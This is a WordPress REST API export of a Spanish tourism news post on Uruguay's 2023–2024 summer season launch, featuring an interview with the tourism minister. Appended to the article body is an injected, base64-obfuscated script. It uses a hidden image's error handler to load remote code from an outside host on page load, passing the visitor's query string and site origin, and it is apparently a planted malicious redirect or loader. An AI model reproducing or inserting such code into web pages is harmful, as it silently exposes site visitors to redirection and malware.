{"id":7614,"date":"2023-11-21T08:27:51","date_gmt":"2023-11-21T11:27:51","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7614"},"modified":"2025-08-13T15:50:37","modified_gmt":"2025-08-13T18:50:37","slug":"uruguay-lanza-la-temporada-turistica-de-verano","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7614","title":{"rendered":"Uruguay lanza la temporada tur\u00edstica de verano"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>El pasado viernes 17 de noviembre se realiz\u00f3 el Lanzamiento de la Temporada 2023 \u2013 2024. All\u00ed el Ministro de Turismo, Tabar\u00e9 Viera anunci\u00f3 que los turistas uruguayos acceder\u00e1n a tasa cero de IVA en hoteler\u00eda del 15 de diciembre al 30 de abril<\/em><\/h4>\n\n\n\n<p>El evento fue encabezado por el presidente de la Rep\u00fablica Luis Lacalle Pou, acompa\u00f1ado por el ministro de Turismo, Tabar\u00e9 Viera; el Subsecretario de Turismo, Remo Monzeglio; el Director General de Secretaria, Ignacio Curbelo; el Director Nacional de Turismo, Roque Baudean; el Intendente de Rocha, Alejo Umpierrez; y el alcalde de La Paloma, Sergio Mu\u00f1iz.<\/p>\n\n\n\n<p>Adem\u00e1s, se hicieron presentes otras autoridades del gobierno nacional, el Intendente de Maldonado, Enrique Antia, Directores de turismo, representantes de las c\u00e1maras y asociaciones privadas, operadores tur\u00edsticos, prensa nacional y extranjera.<\/p>\n\n\n\n<p>En este contexto, Travel2latam convers\u00f3 con Tabar\u00e9 Viera sobre este lanzamiento y las novedades m\u00e1s relevantes para el sector.<\/p>\n\n\n\n<p><strong>\u00bfCu\u00e1les son tus sensaciones de un festejo tan importante como este?<\/strong><\/p>\n\n\n\n<p>Antes que nada, muchas gracias por estar realmente. Hoy es un d\u00eda muy especial, estamos lanzando en una gran fiesta junto a los gobiernos departamentales del Uruguay y los municipios, pero sobre todo con los operadores tur\u00edsticos lo que va a ser la pr\u00f3xima temporada de toda la oferta de Uruguay y bueno a trav\u00e9s de ustedes de la prensa comparti\u00e9ndolo con toda la regi\u00f3n. Uruguay ha trabajado mucho, para Uruguay el turismo es fundamental como ustedes saben y sobre todo el turismo receptivo. Venimos bien, viene creciendo, la cifras nos indica un crecimiento continuo despu\u00e9s de la pandemia despu\u00e9s de la apertura de fronteras, y en ese sentido es auspicioso lo que se viene. Seguimos apostando fuerte a nuestro principal mercado que son nuestros hermanos argentinos, porque a\u00fan con las dificultades que la diferencia cambiaria que hoy nos imponen diferencias de precios importantes siguen siendo el principal mercado, porque competimos sobre todo en esta \u00e9poca del a\u00f1o por la calidad de la oferta, y la diversidad de de esa oferta tur\u00edstica. Tambi\u00e9n estamos esperando a muchos chilenos y brasile\u00f1os, y tenemos indicios de que va a ser una buena temporada esperemos que eso se confirme, nadie tiene la bola de cristal, pero estamos abiertos para recibirlos a todos.<\/p>\n\n\n\n<p><strong>Es un pa\u00eds muy diverso con una oferta incre\u00edble para el verano, entonces \u00bfQu\u00e9 destinos cre\u00e9s que van a tener un despegue por encima de lo que sol\u00edan tener en temporadas anteriores?<\/strong><\/p>\n\n\n\n<p>Yo creo que la costa sigue siendo una\u00a0 oferta consolidada pero que crece, la costa oce\u00e1nica como ac\u00e1 La Paloma y todo el departamento de Rocha, Maldonado, pero tambi\u00e9n est\u00e1n creciendo mucho los destinos costeros tambi\u00e9n, como el propio Montevideo y Canelones, y tambi\u00e9n Colonia, que suma la gran comunicaci\u00f3n que tiene con con Buenos Aires y con toda Argentina, y no solo Colonia del Sacramento viene despleg\u00e1ndose cada vez m\u00e1s sino que el litoral ha logrado desestacionalizarse, las termas que era una oferta de invierno de media estaci\u00f3n b\u00e1sicamente, y hoy en el verano tiene una muy buena ocupaci\u00f3n, y hoy Uruguay ha desarrollado la oferta naturaleza con sus r\u00edos, sus quebradas, con la biodiversidad, el avistamiento de p\u00e1jaros particularmente atrae a mucha gente, tambi\u00e9n el turismo minero en el norte del pa\u00eds; la ruta del Oro, las amatistas y es realmente extraordinaria sumado una gastronom\u00eda especial. El turismo de eventos ha crecido much\u00edsimo en los espect\u00e1culos, shows, eventos en general, y el turismo de cruceros que ha venido creciendo el a\u00f1o pasado el periodo pasado ha tenido un r\u00e9cord extraordinario con 320,000 turistas y en 2024 se agranda la temporada hasta fines de abril, es decir que son 6 meses con m\u00e1s de 240 buques, que vamos a ver cu\u00e1nto terminan recalando, pero va a haber un crecimiento superior al 10%.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/es.travel2latam.com\/news-86331-uruguay-lanza-la-temporada-turistica-de-verano\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"396\" height=\"86\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/06\/Captura-web_27-6-2023_93325_es.travel2latam.com_.jpeg\" alt=\"\" class=\"wp-image-6954\" style=\"aspect-ratio:4.604651162790698;width:239px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/06\/Captura-web_27-6-2023_93325_es.travel2latam.com_.jpeg 396w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/06\/Captura-web_27-6-2023_93325_es.travel2latam.com_-300x65.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/06\/Captura-web_27-6-2023_93325_es.travel2latam.com_-320x69.jpeg 320w\" sizes=\"(max-width: 396px) 100vw, 396px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El pasado viernes 17 de noviembre se realiz\u00f3 el Lanzamiento de la Temporada 2023 \u2013 2024. All\u00ed el Ministro de Turismo, Tabar\u00e9 Viera anunci\u00f3 que los turistas uruguayos acceder\u00e1n a tasa cero de IVA en hoteler\u00eda del 15 de diciembre al 30 de abril El evento fue encabezado por el presidente de la Rep\u00fablica Luis [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7615,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-7614","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7614","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7614"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7614\/revisions"}],"predecessor-version":[{"id":10263,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7614\/revisions\/10263"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7615"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7614"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7614"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7614"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}